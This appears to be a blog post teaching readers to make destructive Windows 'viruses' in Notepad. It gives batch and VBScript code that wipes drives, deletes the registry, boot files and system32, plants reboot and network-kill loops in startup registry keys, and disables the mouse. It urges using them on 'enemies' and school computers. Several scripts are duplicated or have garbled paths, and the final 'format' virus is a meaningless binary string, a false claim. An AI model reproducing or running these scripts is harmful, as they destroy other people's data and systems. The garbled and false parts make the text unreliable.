Make Some Useful & Dangerous Viruses In Notepad!
Create Your Own
Viruses
Today we will
learn how to create simple but dangerous viruses using notepad. These are very
simple to create and use, but don’t dare to use these on your computer because
these viruses can destroy your personal information. Where to use? You can send
these viruses to your enemies or if you wanna try it yourself best and my
favorite place is school computers . Let’s get started.
How to make a
virus ?
- Open Notepad
- Put The Codes Provided
- Save it in the correct extension
- Done
- Wiper [Not Official Name But I call It]
Deletes everything in the computer’s drive
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Save As “Your
File Name.bat [Batch File]
- Registry Deleter
Deletes
everything stored in registry
@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
- No Access
A
good Halloween prank for your friends this stops internet access of the user.
To gain Access type IPconfig /renew in CMD
@echo off
Ipconfig /release
Ipconfig /release
·
Shut Up
Send
your friend a little message and shut down his computer
@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” -s
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” -s
- Crash Puter
This
is simple virus that crashes the computer – [Save As Anything.VBS]
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
- Ez Formatter
This
Simple Virus formats windows drives in less than 5 seconds. Only D,E And C
drives.
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
rd/s/q C:\
rd/s/q E:\
- Shutter
This virus
can be very annoying it shutdowns computer every time the computer is turned
on.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
PAUSE
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
PAUSE
Now its time for few very dangerous viruses
- Rest In Peace
It
crashes PC once used the PC can’t be restarted.. It deletes everything
necessary for starting up windows. Do not use on yourself .
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
- Century
Shut
downs the PC hundred times. To stop Start Run and type shutdown -a . You can
also change the times pc restarts by replacing 100 by your choice.
Create a new
shortcut and type :-
shutdown -s -t
100 c “Installing Updates”
- RIP -2
This
virus does the same It also prevents pc from starting but in an effective and
better way.
del
c:\WINDOWS\system32\*.*/q
- Freak
This
virus disables the internet forever
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime
PAUSE
1.
Go to start > Run and type in cmd and press enter
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime
PAUSE
== How To Disable Mouse
1. Open Notepad and
copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
2. Save this file as virus.bat
3. Done you just created your virus.
== How
To Create Virus To Format Hard Drive ?
1. Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
2. Save the file as Format.exe
3. You just created virus to format Hard Drive. Enjoy !!!
3. You just created virus to format Hard Drive. Enjoy !!!
No comments:
Post a Comment